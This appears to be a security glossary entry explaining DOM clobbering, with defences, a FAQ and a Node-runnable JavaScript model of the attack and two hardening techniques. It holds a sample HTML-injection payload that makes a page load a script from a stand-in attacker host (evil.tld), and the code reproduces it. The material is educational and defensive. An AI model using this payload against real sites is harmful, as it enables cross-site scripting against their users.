DOM Clobbering
What is DOM Clobbering?
A browser-side technique in which attacker-controlled HTML elements with `id` or `name` attributes shadow global JavaScript variables, turning seemingly harmless markup into a vector for XSS, CSP bypass, and gadget chaining.
DOM clobbering exploits a legacy DOM feature: any HTML element with an `id` or `name` attribute is exposed as a property on `window` (and, for form fields, on its parent form). An attacker who can inject limited HTML — say through a markdown renderer or a relaxed sanitizer — can therefore create variables that override or define globals, even with all script tags blocked. Classic targets include `window.config`, library globals such as `_wpemojiSettings`, and properties a strict CSP otherwise protects. Modern research (Khodayari & Pellegrino, Heyes, and the 2023 attacks on widely used sanitizers like DOMPurify) demonstrated reliable gadget chains turning HTML-only injection into full XSS by hijacking framework lookups (`window.config.url`, `document.currentScript.src`). Defenses include using `document.getElementById` instead of bare global lookups, accessing globals via `let`/`const`, locking sensitive properties on `window`, and configuring sanitizers to strip or namespace `id`/`name` attributes on user-controlled HTML.
● Examples
- 01
A markdown comment containing `<a id=config><a id=config name=url href=//evil>` causes the page's loader to fetch a script from evil.tld.
- 02
A 2023 DOMPurify advisory adds `id` and `name` attributes to the sanitizer's strip-list to defeat known DOM-clobbering gadget chains.
● FAQ
What is DOM Clobbering?
A browser-side technique in which attacker-controlled HTML elements with `id` or `name` attributes shadow global JavaScript variables, turning seemingly harmless markup into a vector for XSS, CSP bypass, and gadget chaining. It belongs to the application security category of cybersecurity.
What does DOM Clobbering mean?
A browser-side technique in which attacker-controlled HTML elements with `id` or `name` attributes shadow global JavaScript variables, turning seemingly harmless markup into a vector for XSS, CSP bypass, and gadget chaining.
How does DOM Clobbering work?
DOM clobbering exploits a legacy DOM feature: any HTML element with an `id` or `name` attribute is exposed as a property on `window` (and, for form fields, on its parent form). An attacker who can inject limited HTML — say through a markdown renderer or a relaxed sanitizer — can therefore create variables that override or define globals, even with all script tags blocked. Classic targets include `window.config`, library globals such as `_wpemojiSettings`, and properties a strict CSP otherwise protects. Modern research (Khodayari & Pellegrino, Heyes, and the 2023 attacks on widely used sanitizers like DOMPurify) demonstrated reliable gadget chains turning HTML-only injection into full XSS by hijacking framework lookups (`window.config.url`, `document.currentScript.src`). Defenses include using `document.getElementById` instead of bare global lookups, accessing globals via `let`/`const`, locking sensitive properties on `window`, and configuring sanitizers to strip or namespace `id`/`name` attributes on user-controlled HTML.
How do you defend against DOM Clobbering?
Defenses against DOM Clobbering usually combine technical controls with operational practices; see the full definition above.
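The "how it works" and "how to defend" answers above describe the mechanism and the defenses in prose. The following is an added example, not code from the page or from any project it mentions, that models the two facts a defender relies on: named-element lookup on `window` only resolves names that are not already own properties of `window`, and a value obtained by a bare global lookup must be validated before it is trusted. Everything here is constructed so it runs in Node without a browser: `makeWindowModel` stands in for a real window, `CLOBBERED_NAMES` stands in for what the page's `<a id=config><a id=config name=url href=//evil>` markup would expose, and `/static/app.js` and `evil.tld` are placeholder values. The `getElementById` defense is not modelled because it needs a real document.

```javascript
// Added example (not the page's or any project's code): a Node-runnable model of
// why DOM clobbering works and how two of the listed defences stop it.
// Constructed assumptions: makeWindowModel stands in for a browser window,
// CLOBBERED_NAMES for the elements the injected markup would expose, and the
// '/static/app.js' and 'evil.tld' strings are placeholder values.

// What the injected markup would expose: window.config resolves to an
// element-like value whose `url` member is a second anchor, and
// String(anchor) yields that anchor's href.
const evilAnchor = {
  nodeType: 1, tagName: 'A', href: '//evil.tld/x.js',
  toString() { return this.href; },
};
const CLOBBERED_NAMES = new Map([
  ['config', { nodeType: 1, tagName: 'A', url: evilAnchor }],
]);

// The browser rule that matters for the defence: named-element lookup on
// window only applies to names that are NOT own properties of window.
function makeWindowModel(namedElements) {
  const own = {};
  return new Proxy(own, {
    get(target, key) {
      if (Object.prototype.hasOwnProperty.call(target, key)) return target[key];
      return namedElements.get(key); // the clobbering path
    },
    has(target, key) {
      return Object.prototype.hasOwnProperty.call(target, key) || namedElements.has(key);
    },
  });
}

// Defence 1: install the sensitive global as a frozen, non-configurable own
// property (the effect of a top-level `const config = ...` or of
// Object.defineProperty on window) before any user HTML is rendered, so
// later markup cannot shadow it.
function lockGlobal(win, name, value) {
  Object.defineProperty(win, name, {
    value: Object.freeze(value), writable: false, configurable: false, enumerable: true,
  });
}

// Defence 2: validate what a bare global lookup returned before using it.
// A clobbered global is an Element or an HTMLCollection, never a plain object.
function looksLikeDomNode(v) {
  return v !== null && typeof v === 'object' &&
    (typeof v.nodeType === 'number' ||
     (typeof v.length === 'number' && typeof v.item === 'function'));
}
function readScriptUrl(win) {
  const cfg = win.config;
  if (cfg === null || typeof cfg !== 'object') return null;
  if (looksLikeDomNode(cfg) || looksLikeDomNode(cfg.url)) return null;
  // A same-realm plain object is expected; anything else is not our config.
  if (Object.getPrototypeOf(cfg) !== Object.prototype) return null;
  // Only a same-origin absolute path is acceptable; this rejects
  // protocol-relative values such as //evil.tld that a clobbered anchor yields.
  if (typeof cfg.url !== 'string' || !/^\/(?!\/)[\w./-]*$/.test(cfg.url)) return null;
  return cfg.url;
}

// Runs the three scenarios and returns what a loader would fetch in each.
function demo() {
  const unlocked = makeWindowModel(CLOBBERED_NAMES);
  // What a loader doing `fetch(window.config.url)` gets on the unhardened page.
  const naive = String(unlocked.config.url);
  // The same lookup through the validating reader: rejected.
  const validated = readScriptUrl(unlocked);
  // The lookup once the global has been locked ahead of the injected markup.
  const locked = makeWindowModel(CLOBBERED_NAMES);
  lockGlobal(locked, 'config', { url: '/static/app.js' });
  const hardened = readScriptUrl(locked);
  return { naive, validated, hardened };
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

`demo()` returns `naive: '//evil.tld/x.js'` (the unhardened loader would fetch the attacker's script), `validated: null` (the shape check rejects the element-like value) and `hardened: '/static/app.js'` (the locked own property wins over the named element). In a real page the lock must run in a script that executes before the user-controlled HTML is parsed, and the sanitizer should still strip `id`/`name` so that globals you forgot to lock are not reachable either.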
What other names does DOM Clobbering go by?
Common aliases include: HTML namespace pollution, Named-element global hijack.
● Related terms
- attacks№ 265
Cross-site scripting (XSS)
A web vulnerability in which an attacker injects malicious script into pages viewed by other users, so that it runs in the victim's browser with the origin of that site.
- attacks№ 1225
Stored XSS
A persistent form of cross-site scripting in which the attacker's injected script is saved on the server and executed in the browser of every visitor.
- appsec№ 237
Content Security Policy (CSP)
An HTTP response header that tells the browser which sources may supply scripts, styles, frames and other content, limiting the impact of XSS and data injection attacks.
- appsec№ 1302
Trusted Types
A browser API and CSP directive requiring that dangerous DOM sinks accept only typed values vetted by a policy, preventing DOM-based XSS.
- appsec№ 599
Input validation
Server-side checking, before the application processes data, that all untrusted input conforms to the expected type, length, range, format and set of allowed values.
- appsec№ 866
Output encoding
Converting untrusted data into a form that is safe for the specific output context (HTML, JavaScript, URL, SQL, shell), so that it cannot escape and be executed as code.